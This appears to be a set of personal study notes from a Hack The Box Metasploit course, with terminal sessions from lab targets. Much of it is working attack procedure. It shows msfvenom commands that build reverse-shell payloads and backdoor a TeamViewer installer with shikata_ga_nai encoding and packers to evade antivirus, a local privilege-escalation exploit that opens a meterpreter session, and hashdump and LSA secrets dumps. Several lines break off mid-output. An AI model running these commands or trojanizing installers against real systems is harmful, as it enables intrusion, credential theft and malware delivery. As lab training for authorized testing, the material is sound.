Attempting to encode payload with 1 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 381 (iteration=0)

x86/shikata_ga_nai chosen with final size 381

Payload size: 381 bytes

Final size of perl file: 1674 bytes

my $buf =

"\xda\xc1\xba\x37\xc7\xcb\x5e\xd9\x74\x24\xf4\x5b\x2b\x

MSF-VirusTotal

MSF - VirusTotal

  Encoders

Tonyleevo@htb[/htb]$ msf-virustotal -k <API key> -f TeamViewerInstall.exe

[*] Using API key: <API key>

[*] Please wait while I upload TeamViewerInstall.exe...

[*] VirusTotal: Scan request successfully queued, come back later for the report

[*] Sample MD5 hash : 4f54cc46e2f55be168cc6114b74a3130

[*] Sample SHA1 hash : 53fcb4ed92cf40247782de41877b178ef2a9c5a9

[*] Sample SHA256 hash : 66894cbecf2d9a31220ef811a2ba65c06fdfecddbc729d006fdab10e43368da8

[*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1651750343

[*] Requesting the report...

[*] Received code -2. Waiting for another 60 seconds...

[*] Received code -2. Waiting for another 60 seconds...

[*] Received code -2. Waiting for another 60 seconds...

[*] Received code -2. Waiting for another 60 seconds...

[*] Received code -2. Waiting for another 60 seco

databases

Setting up the Database

First, we must ensure that the PostgreSQL server is up and running on our host machine. To do so, input the following command:

PostgreSQL Status

  Databases

Tonyleevo@htb[/htb]$ sudo service postgresql status

● postgresql.service - PostgreSQL RDBMS

Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)

Active: active (exited) since Fri 2022-05-06 14:51:30 BST; 3min 51s ago

Process: 2147 ExecStart=/bin/true (code=exited, status=0/SUCCESS)

Main PID: 2147 (code=exited, status=0/SUCCESS)

CPU: 1ms

May 06 14:51:30 pwnbox-base systemd[1]: Starting PostgreSQL RDBMS...

May 06 14:51:30 pwnbox-base systemd[1]: Finished PostgreSQL RDBMS.

Start PostgreSQL

  Databases

Tonyleevo@htb[/htb]$ sudo systemctl start postgresql

After starting PostgreSQL, we need to create and initialize the MSF database with msfdb init.

MSF - Initiate a Database

  Databases

Tonyleevo@htb[/htb]$ sudo msfdb init

[i] Database already started

[+] Creating database user 'msf'

[+] Creating databases 'msf'

[+] Creating databases 'msf_test'

[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'

[+] Creating initial database schema

rake aborted!

  Databases

Tonyleevo@htb[/htb]$ sudo msfdb init

[i] Database already started

[i] The database appears to be already configured, skipping initialization

If the initialization is skipped and Metasploit tells us that the database is already configured, we can recheck the status of the database.

  Databases

Tonyleevo@htb[/htb]$ sudo msfdb status

● postgresql.service - PostgreSQL RDBMS

Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)

Active: active (exited) since Mon 2022-05-09 15:19:57 BST; 35min ago

Process: 2476 ExecStart=/bin/true (code=exited, status=0/SUCCESS)

Main PID: 2476 (code=exited, status=0/SUCCESS)

MSF - Connect to the Initiated Database

  Databases

Tonyleevo@htb[/htb]$ sudo msfdb run

[i] Database already started

. .

.

dBBBBBBb dBBBP dBBBBBBP dBBBBBb .

MSF - Reinitiate the Database

  Databases

Tonyleevo@htb[/htb]$ msfdb reinit

Tonyleevo@htb[/htb]$ cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/

Tonyleevo@htb[/htb]$ sudo service postgresql restart

Tonyleevo@htb[/htb]$ msfconsole -q

msf6 > db_status

[*] Connected to msf. Connection type: PostgreSQL.

Now, we are good to go. The msfconsole also offers integrated help for the database. This gives us a good overview of interacting with and using the database.

MSF - Database Options

  Databases

msf6 > help database

Database Backend Commands

=========================

Command Description

------- -----------

db_connect Connect to an existing database

db_disconnect Disconnect from the current

Notice that the default Workspace is named default and is currently in use according to the * symbol. Type the workspace [name] command to switch the presently used workspace. Looking back at our example, let us create a workspace for this assessment and select it.

  Databases

msf6 > workspace -a Target_1

[*] Added workspace: Target_1

[*] Workspace: Target_1

msf6 > workspace Target_1

[*] Workspace: Target_1

msf6 > workspace

default

* Target_1

To see what else we can do with Workspaces, we can use the workspace -h command for the help menu related to Workspaces.

  Databases

msf6 > workspace -h

Usage:

workspace List workspaces

workspace -v List workspaces verbosely

workspace [name] Switch workspace

workspace -a [name] ... Add workspace(s)

workspace -d [name] ... Delete workspace(s)

workspace -D Delete all workspaces

workspace -r Rename workspace

workspace -h Show this help information

Stored Nmap Scan

  Databases

Tonyleevo@htb[/htb]$ cat Target.nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 20:54 UTC

Nmap scan report for 10.10.10.40

Host is up (0.017s latency).

Not shown: 991 closed ports

PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

49152/tcp open msrpc Microsoft Windows RPC

49153/tcp open msrpc Microsoft Windows RPC

49154/tcp open msrpc Microsoft Windows RPC

49155/tcp open msrpc Microsoft Windows RPC

49156/tcp open msrpc Microsoft Windows RPC

49157/tcp open msrpc Microsoft Windows RPC

Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 60.81 seconds

Importing Scan Results

  Databases

msf6 > db_import Target.xml

[*] Importing 'Nmap XML' data

[*] Import: Parsing with 'Nokogiri v1.10.9'

[*] Importing host 10.10.10.40

[*] Successfully imported ~/Target.xml

using nmap

Using Nmap Inside MSFconsole

Alternatively, we can use Nmap straight from msfconsole! To scan directly from the console without having to background or exit the process, use the db_nmap command.

MSF - Nmap

  Databases

msf6 > db_nmap -sV -sS 10.10.10.8

[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 21:04 UTC

[*] Nmap: Nmap scan report for 10.10.10.8

[*] Nmap: Host is up (0.016s latency).

[*] Nmap: Not shown: 999 filtered ports

[*] Nmap: PORT STATE SERVICE VERSION

[*] Nmap: 80/TCP open http HttpFileServer httpd 2.3

[*] Nmap: Service Info: OS: Windows; CPE: cpe:

loot

Loot

The loot command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more.

MSF - Stored Loot

  Databases

msf6 > loot -h

Usage: loot [options]

Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]

Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]

Del: loot -d [addr1 addr2 ...]

plugins

Using Plugins

To start using a plugin, we will need to ensure it is installed in the correct directory on our machine. Navigating to /usr/share/metasploit-framework/plugins, which is the default directory for every new installation of msfconsole, should show us which plugins we have to our availability:

  Plugins

Tonyleevo@htb[/htb]$ ls /usr/share/metasploit-framework/plugins

aggregator.rb beholder.rb event_tester.rb komand.rb msfd.rb nexpose.rb request.rb session_notifier.rb sounds.rb token_adduser.rb wmap.rb

alias.rb db_credcollect.rb ffautoregen.rb lab.rb msgrpc.rb openvas.rb rssfeed.rb session_tagger.rb sqlmap.rb token_hunter.rb

auto_add_route.rb db_tracker.rb ips_filter.rb libnotify.rb nessus.rb pcap_log.rb sample.rb socket_logger.rb thread.rb wiki.rb

MSF - Load Nessus

  Plugins

msf6 > load nessus

[*] Nessus Bridge for Metasploit

[*] Type nessus_help for a command listing

[*] Successfully loaded Plugin: Nessus

msf6 > nessus_help

Command Help Text

------- ---------

Generic Commands

Installing new Plugins

New, more popular plugins are installed with each update of the Parrot OS distro as they are pushed out towards the public by their makers, collected in the Parrot update repo. To install new custom plugins not included in new updates of the distro, we can take the .rb file provided on the maker's page and place it in the folder at /usr/share/metasploit-framework/plugins with the proper permissions.

For example, let us try installing DarkOperator's Metasploit-Plugins. Then, following the link above, we get a couple of Ruby (.rb) files which we can directly place in the folder mentioned above.

Downloading MSF Plugins

  Plugins

Tonyleevo@htb[/htb]$ git clone https://github.com/darkoperator/Metasploit-Plugins

Tonyleevo@htb[/htb]$ ls Metasploit-Plugins

aggregator.rb ips_filter.rb pcap_log.rb sqlmap.rb

alias.rb komand.rb pentest.rb thread.rb

auto_add_route.rb lab.rb request.rb token_adduser.rb

beholder.rb libnotify.rb rssfeed.rb token_hunter.rb

db_credcollect.rb msfd.rb sample.rb twitt.rb

sessions

Listing Active Sessions

We can use the sessions command to view our currently active sessions.

  Sessions

msf6 exploit(windows/smb/psexec_psh) > sessions

Active sessions

===============

Id Name Type Information Connection

-- ---- ---- ----------- ----------

1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ MS01 10.10.10.129:443 -> 10.10.10.205:50501 (10.10.10.205)

Interacting with a Session

You can use the sessions -i [no.] command to open up a specific session.

  Sessions

msf6 exploit(windows/smb/psexec_psh) > sessions -i 1

[*] Starting interaction with 1...

meterpreter >

Meterpreter session, binding the module to it.

MSF - Session Handling

  Meterpreter

meterpreter > bg

Background session 1? [y/N] y

msf6 exploit(windows/iis/iis_webdav_upload_asp) > search local_exploit_suggester

Matching Modules

================

# Name Disclosure Date Rank Check Description

• ---- --------------- ---- ----- -----------

0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester

msf6 exploit(windows/iis/iis_webdav_upload_asp) > use 0

msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

Name Current Setting Required Description

---- --------------- -------- -----------

SESSION yes The session to run this module on

SHOWDESCRIPTION false yes Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1

SESSION => 1

msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...

[*] 10.10.10.15 - 34 exploit checks are being tried...

nil versions are discouraged and will be deprecated in Rubygems 4

[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.

[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.

[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.

[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.

[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.

[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

[*] Post module execution completed

jobs

Viewing the Jobs Command Help Menu

We can view the help menu for this command, like others, by typing jobs -h.

  Sessions

msf6 exploit(multi/handler) > jobs -h

Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

-K Terminate all running jobs.

-P Persist all running jobs on restart.

-S <opt> Row search filter.

-h Help banner.

-i <opt> Lists detailed information ab

Viewing the Exploit Command Help Menu

When we run an exploit, we can run it as a job by typing exploit -j. Per the help menu for the exploit command, adding -j to our command. Instead of just exploit or run, will "run it in the context of a job."

  Sessions

msf6 exploit(multi/handler) > exploit -h

Usage: exploit [options]

Launches an exploitation attempt.

OPTIONS:

-J Force running in the foreground, even if passive.

-e <opt> The payload encoder to use. If none is specified, ENCODER is used.

-f Force the exploit to run regardless of the value of MinimumRank.

-h Help banner.

-j Run in the context of a job.

<SNIP

Running an Exploit as a Background Job

  Sessions

msf6 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.34:4444

Listing Running Jobs

To list all running jobs, we can use the jobs -l command. To kill a specific job, look at the index no. of the job and use the kill [index no.] command. Use the jobs -K command to kill all running jobs.

  Sessions

msf6 exploit(multi/handler) > jobs -l

Jobs

====

Id Name Payload Payload opts

-- ---- ------- ------------

0 Exploit: multi/handler generic/shell_reverse_tcp tcp://10.10.14.34:4444

privEsc

MSF - Privilege Escalation

  Meterpreter

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_images

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/local/ms15_051_client_copy_image) > show options

Module options (exploit/windows/local/ms15_051_client_copy_image):

Name Current Setting Required Description

---- --------------- -------- -----------

SESSION yes The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 46.101.239.181 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows x86

msf6 exploit(windows/local/ms15_051_client_copy_image) > set session 1

session => 1

msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST tun0

LHOST => tun0

msf6 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.14.26:4444

[*] Launching notepad to host the exploit...

[+] Process 844 launched.

[*] Reflectively injecting the exploit DLL into 844...

[*] Injecting exploit into 844...

[*] Exploit injected. Injecting payload into 844...

[*] Payload injected. Executing exploit...

[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

[*] Sending stage (175174 bytes) to 10.10.10.15

[*] Meterpreter session 2 opened (10.10.14.26:4444 -> 10.10.10.15:1031) at 2020-09-03 10:35:01 +0000

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

hashes and LSA secrets dump

MSF - Dumping Hashes

  Meterpreter

meterpreter > hashdump

Administrator:500:c74761604a24f0dfd0a9ba2c30e462cf:d6908f022af0373e9e21b8a241c86dca:::

ASPNET:1007:3f71d62ec68a06a39721cb3f54f04a3b:edc0d5506804653f58964a2376bbd769:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

IUSR_GRANPA:1003:a274b4532c9ca5cdf684351fab962e86:6a981cb5e038b2d8b713743a50d89c88:::

IWAM_GRANPA:1004:95d112c4da2348b599183ac6b1d67840:a97f39734c21b3f6155ded7821d04d16:::

Lakis:1009:f927b0679b3cc0e192410d9b0b40873c:3064b6fc432033870c6730228af7867c:::

SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:8ed3993efb4e6476e4f75caebeca93e6:::

meterpreter > lsa_dump_sam

[+] Running as SYSTEM

[*] Dumping SAM

Domain : GRANNY

SysKey : 11b5033b62a3d2d6bb80a0d45ea88bfb

Local SID : S-1-5-21-1709780765-3897210020-3926566182

SAMKey : 37ceb48682ea1b0197c7ab294ec405fe

RID : 000001f4 (500)

User : Administrator

Hash LM : c74761604a24f0dfd0a9ba2c30e462cf

Hash NTLM: d6908f022af0373e9e21b8a241c86dca

RID : 000001f5 (501)

User : Guest

RID : 000003e9 (1001)

User : SUPPORT_388945a0

Hash NTLM: 8ed3993efb4e6476e4f75caebeca93e6

RID : 000003eb (1003)

User : IUSR_GRANPA

Hash LM : a274b4532c9ca5cdf684351fab962e86

Hash NTLM: 6a981cb5e038b2d8b713743a50d89c88

RID : 000003ec (1004)

User : IWAM_GRANPA

Hash LM : 95d112c4da2348b599183ac6b1d67840

Hash NTLM: a97f39734c21b3f6155ded7821d04d16

RID : 000003ef (1007)

User : ASPNET

Hash LM : 3f71d62ec68a06a39721cb3f54f04a3b

Hash NTLM: edc0d5506804653f58964a2376bbd769

RID : 000003f1 (1009)

User : Lakis

Hash LM : f927b0679b3cc0e192410d9b0b40873c

Hash NTLM: 3064b6fc432033870c6730228af7867c

MSF - Meterpreter LSA Secrets Dump

  Meterpreter

meterpreter > lsa_dump_secrets

[+] Running as SYSTEM

[*] Dumping LSA secrets

Domain : GRANNY

SysKey : 11b5033b62a3d2d6bb80a0d45ea88bfb

Local name : GRANNY ( S-1-5-21-1709780765-3897210020-3926566182 )

Domain name : HTB

Policy subsystem is : 1.7

LSA Key : ada60ee248094ce782807afae1711b2c

Secret : aspnet_WP_PASSWORD

cur/text: Q5C'181g16D'=F

Secret : D6318AF1-462A-48C7-B6D9-ABB7CCD7975E-SRV

cur/hex : e9 1c c7 89 aa 02 92 49 84 58 a4 26 8c 7b 1e c2

Secret : DPAPI_SYSTEM

cur/hex : 01 00 00 00 7a 3b 72 f3 cd ed 29 ce b8 09 5b b0 e2 63 73 8a ab c6 ca 49 2b 31 e7 9a 48 4f 9c b3 10 fc fd 35 bd d7 d5 90 16 5f fc 63

full: 7a3b72f3cded29ceb8095bb0e263738aabc6ca492b31e79a484f9cb310fcfd35bdd7d590165ffc63

m/u : 7a3b72f3cded29ceb8095bb0e263738aabc6ca49 / 2b31e79a484f9cb310fcfd35bdd7d590165ffc63

Secret : L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75

cur/hex : 52 53 41 32 48 00 00 00 00 02 00 00 3f 00 00 00 01 00 01 00 b3 ec 6b 48 4c ce e5 48 f1 cf 87 4f e5 21 00 39 0c 35 87 88 f2 51 41 e2 2a e0 01 83 a4 27 92 b5 30 12 aa 70 08 24 7c 0e de f7 b0 22 69 1e 70 97 6e 97 61 d9 9f 8c 13 fd 84 dd 75 37 35 61 89 c8 00 00 00 00 00 00 00 00 97 a5 33 32 1b ca 65 54 8e 68 81 fe 46 d5 74 e8 f0 41 72 bd c6 1e 92 78 79 28 ca 33 10 ff 86 f0 00 00 00 00 45 6d d9 8a 7b 14 2d 53 bf aa f2 07 a1 20 29 b7 0b ac 1c c4 63 a4 41 1c 64 1f 41 57 17 d1 6f d5 00 00 00 00 59 5b 8e 14 87 5f a4 bc 6d 8b d4 a9 44 6f 74 21 c3 bd 8f c5 4b a3 81 30 1a f6 e3 71 10 94 39 52 00 00 00 00 9d 21 af 8c fe 8f 9c 56 89 a6 f4 33 f0 5a 54 e2 21 77 c2 f4 5c 33 42 d8 6a d6 a5 bb 96 ef df 3d 00 00 00 00 8c fa 52 cb da c7 10 71 10 ad 7f b6 7d fb dc 47 40 b2 0b d9 6a ff 25 bc 5f 7f ae 7b 2b b7 4c c4 00 00 00 00 89 ed 35 0b 84 4b 2a 42 70 f6 51 ab ec 76 69 23 57 e3 8f 1b c3 b1 99 9e 31 09 1d 8c 38 0d e7 99 57 36 35 06 bc 95 c9 0a da 16 14 34 08 f0 8e 9a 08 b9 67 8c 09 94 f7 22 2e 29 5a 10 12 8f 35 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

searching

MSF - Search for Exploits

  Writing and Importing Modules

msf6 > search nagios

Matching Modules

================

# Name Disclosure Date Rank Check Description

• ---- --------------- ---- ----- -----------

0 exploit/linux/http/nagios_xi_authenticated_rce 2019-07-29 excellent Yes Nagios XI Authenticated Remote Command Execution

1 exploit/linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution

2 exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution

3 exploit/linux/http/nagios_xi_magpie_debug 2018-11-14 excellent Yes Nagios XI Magpie_debug.php Root Remote Code Execution

4 exploit/linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution

5 exploit/unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution

6 exploit/unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection

7 post/linux/gather/enum_nagios_xi 2018-04-17 normal No Nagios XI Enumeration

We can, however, find the exploit code inside ExploitDB's entries. Alternatively, if we do not want to use our web browser to search for a specific exploit within ExploitDB, we can use the CLI version, searchsploit.

  Writing and Importing Modules

Tonyleevo@htb[/htb]$ searchsploit nagios3

--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Exploit Title | Path

--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Nagios3 - 'history.cgi' Host Command Execution (Metasploit) | linux/remote/24159.rb

Nagios3 - 'history.cgi' Remote Command Execution | multiple/remote/24084.py

Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit) | cgi/webapps/16908.rb

Nagios3 - 'statuswml.cgi' Command Injection (Metasploit) | unix/webapps/9861.rb

--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Shellcodes: No Results

Tonyleevo@htb[/htb]$ searchsploit -t Nagios3 --exclude=".py"

--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Exploit Title | Path

--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Nagios3 - 'history.cgi' Host Command Execution (Metasploit) | linux/remote/24159.rb

Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit) | cgi/webapps/16908.rb

Nagios3 - 'statuswml.cgi' Command Injection (Metasploit) | unix/webapps/9861.rb

--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Shellcodes: No Results

We have to download the .rb file and place it in the correct directory. The default directory where all the modules, scripts, plugins, and msfconsole proprietary files are stored is /usr/share/metasploit-framework. The critical folders are also symlinked in our home and root folders in the hidden ~/.msf4/ location.

MSF - Directory Structure

  Writing and Importing Modules

Tonyleevo@htb[/htb]$ ls /usr/share/metasploit-framework/

app db Gemfile.lock modules msfdb msfrpcd msf-ws.ru ruby script-recon vendor

config documentation lib msfconsole msf-json-rpc.ru msfupdate plugins script-exploit scripts

data Gemfile metasploit-framework.gemspec msfd msfrpc msfvenom Rakefile script-password tools

  Writing and Importing Modules

Tonyleevo@htb[/htb]$ ls .msf4/

history local logos logs loot modules plugins store

We copy it into the appropriate directory after downloading the exploit. Note that our home folder .msf4 location might not have all the folder structure that the /usr/share/metasploit-framework/ one might have. So, we will just need to mkdir the appropriate folders so that the structure is the same as the original folder so that msfconsole can find the new modules. After that, we will be proceeding with copying the .rb script directly into the primary location.

Please note that there are certain naming conventions that, if not adequately respected, will generate errors when trying to get msfconsole to recognize the new module we installed. Always use snake-case, alphanumeric characters, and underscores instead of dashes.

For example:

• nagios3_command_injection.rb
• our_module_here.rb

MSF - Loading Additional Modules at Runtime

  Writing and Importing Modules

Tonyleevo@htb[/htb]$ cp ~/Downloads/9861.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/nagios3_command_injection.rb

Tonyleevo@htb[/htb]$ msfconsole -m /usr/share/metasploit-framework/modules/

msfvenom

Generating Payload

  Introduction to MSFVenom

Tonyleevo@htb[/htb]$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 341 bytes

Final size of aspx file: 2819 bytes

security policies

Evasion Techniques

Most host-based anti-virus software nowadays relies mainly on Signature-based Detection to identify aspects of malicious code present in a software sample. These signatures are placed inside the Antivirus Engine, where they are subsequently used to scan storage space and running processes for any matches. When a piece of unknown software lands on a partition and is matched by the Antivirus software, most Anti-viruses quarantine the malicious program and kill the running process.

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

Attempting to read payload from STDIN...

Found 1 compatible encoders

Attempting to encode payload with 5 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 27 (iteration=0)

x86/shikata_ga_nai succeeded with size 54 (iteration=1)

x86/shikata_ga_nai succeeded with size 81 (iteration=2)

x86/shikata_ga_nai succeeded with size 108 (iteration=3)

x86/shikata_ga_nai succeeded with size 135 (iteration=4)

x86/shikata_ga_nai chosen with final size 135

Payload size: 135 bytes

Saved as: /home/user/Desktop/TeamViewer_Setup.exe

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ ls

Pictures-of-cats.tar.gz TeamViewer_Setup.exe Cake_recipes

Generating Payload

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5

Attempting to read payload from STDIN...

Found 1 compatible encoders

Attempting to encode payload with 5 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 27 (iteration=0)

x86/shikata_ga_nai succeeded with size 54 (iteration=1)

x86/shikata_ga_nai succeeded with size 81 (iteration=2)

x86/shikata_ga_nai succeeded with size 108 (iteration=3)

x86/shikata_ga_nai succeeded with size 135 (iteration=4)

x86/shikata_ga_nai chosen with final size 135

Payload size: 135 bytes

Saved as: /home/user/test.js

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ cat test.js

�+n"����t$�G4ɱ1zz��j�V6����ic��o�Bs>��Z*�����9vt��%��1�

<...SNIP...>

�Qa*���޴��RW�%Š.\�=;.l�T���XF���T��

VirusTotal

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ msf-virustotal -k <API key> -f test.js

[*] WARNING: When you upload or otherwise submit content, you give VirusTotal

[*] (and those we work with) a worldwide, royalty free, irrevocable and transferable

[*] licence to use, edit, host, store, reproduce, modify, create derivative works,

[*] communicate, publish, publicly perform, publicly display and distribute such

[*] content. To read the complete Terms of Service for VirusTotal, please go to the

[*] following link:

[*] https://www.virustotal.com/en/about/terms-of-service/

[*]

[*] If you prefer your own API key, you may obtain one at VirusTotal.

[*] Enter 'Y' to acknowledge: Y

[*] Using API key: <API key>

[*] Please wait while I upload test.js...

[*] VirusTotal: Scan request successfully queued, come back later for the report

[*] Sample MD5 hash : 35e7687f0793dc3e048d557feeaf615a

[*] Sample SHA1 hash : f2f1c4051d8e71df0741b40e4d91622c4fd27309

[*] Sample SHA256 hash : 08799c1b83de42ed43d86247ebb21cca95b100f6a45644e99b339422b7b44105

[*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1652167047

[*] Requesting the report...

[*] Received code 0. Waiting for another 60 seconds...

Packers

The term 

 refers to the result of an 

 process where the payload is packed together with an executable program and with the decompression code in one single file. When run, the decompression code returns the backdoored executable to its original state, allowing for yet another layer of protection against file scanning mechanisms on target hosts. This process takes place transparently for the compressed executable to be run the same way as the original executable while retaining all of the original functionality. In addition, msfvenom provides the ability to compress and change the file structure of a backdoored executable and encrypt the underlying process structure.

A list of popular packer software:

netcat

Tonyleevo@htb[/htb]$ nc -lvnp 1234

listening on [any] 1234 ...

Tonyleevo@htb[/htb]$ ip a